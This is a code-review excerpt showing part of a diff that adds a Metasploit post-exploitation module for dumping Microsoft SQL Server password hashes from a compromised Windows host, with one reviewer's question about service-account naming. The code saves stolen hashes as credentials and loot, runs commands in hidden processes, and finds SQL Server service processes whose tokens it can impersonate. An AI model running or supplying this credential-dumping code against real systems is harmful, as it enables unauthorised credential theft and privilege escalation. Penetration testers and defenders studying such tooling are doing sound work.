modules/post/windows/manage/mssql_local_hashdump.rb

```diff
@@ -0,0 +1,430 @@
+      }
+
+      # Initialize Metasploit::Credential::Core object
+      credential_data = {
+        post_reference_name: refname,
+        origin_type: :session,
+        private_type: :nonreplayable_hash,
+        private_data: hash,
+        username: user,
+        session_id: session_db_id,
+        jtr_format: hashtype,
+        workspace_id: myworkspace_id
+      }
+
+      credential_data.merge!(service_data)
+
+      # Create the Metasploit::Credential::Core object
+      credential_core = create_credential(credential_data)
+
+      # Assemble the options hash for creating the Metasploit::Credential::Login object
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      # Merge in the service data and create our Login
+      login_data.merge!(service_data)
+      login = create_credential_login(login_data)
+
+      print_good("#{rhost} Saving = #{user}:#{hash}")
+
+      loot_hashes << user+":"+hash+"\n"
+ 
+    end
+    if loot_hashes != "" 
+        # Store MSSQL password hash as loot
+        loot_path = store_loot('mssql.hash', 'text/plain', session, loot_hashes, 'mssql_hashdump.txt', 'MSSQL Password Hash')
+        print_good("MSSQL password hash saved in: #{loot_path}")
+        return 1
+    else
+        return 0
+    end
+  end
+
+  ## ----------------------------------------------
+  ## Method for executing cmd and returning the response
+  ## Note: This is from one of Jabra's modules - Thanks man!
+  ##----------------------------------------------
+  def run_cmd(cmd,token=true)
+    opts = {'Hidden' => true, 'Channelized' => true, 'UseThreadToken' => token}
+    process = session.sys.process.execute(cmd, nil, opts)
+    res = ""
+    while (d = process.channel.read)
+      break if d == ""
+      res << d
+    end
+    process.channel.close
+    process.close
+    return res
+  end
+
+
+  ## ----------------------------------------------
+  ## Method for impersonating sql server instance
+  ## Taken from mssql_local_auth_bypass
+  ## Thanks Scott Sutherland !
+  ## ----------------------------------------------
+  def impersonate_sql_user(service_instance,verbose)
+
+    # Print the current user
+    blah = session.sys.config.getuid if verbose == "true"
+    print_status("Current user: #{blah}") if verbose == "true"
+
+    # Define target user/pid
+    targetuser = ""
+    targetpid = ""
+
+    # Identify SQL Server service processes
+    print_status("Searching for sqlservr.exe processes not running as SYSTEM...")
+    session.sys.process.get_processes().each do |x|
+
+      # Search for all sqlservr.exe processes
+      if ( x['name'] == "sqlservr.exe" and x['user'] != "NT AUTHORITY\\SYSTEM")
+
+        # Found one
+        print_good("Found \"#{x['user']}\" running sqlservr.exe process #{x['pid']}")
+
+        # Define target pid / user
+        if x['user'] =~ /NT SERVICE/ then
+          if x['user'] == "NT SERVICE\\MSSQL$#{service_instance}" then
```

Comment:
Is it safe to assume the user for the service will follow this format? Would it be better to just iterate over the instances in the registry, correlate to server instances, and use the usernames specified in the service config instead?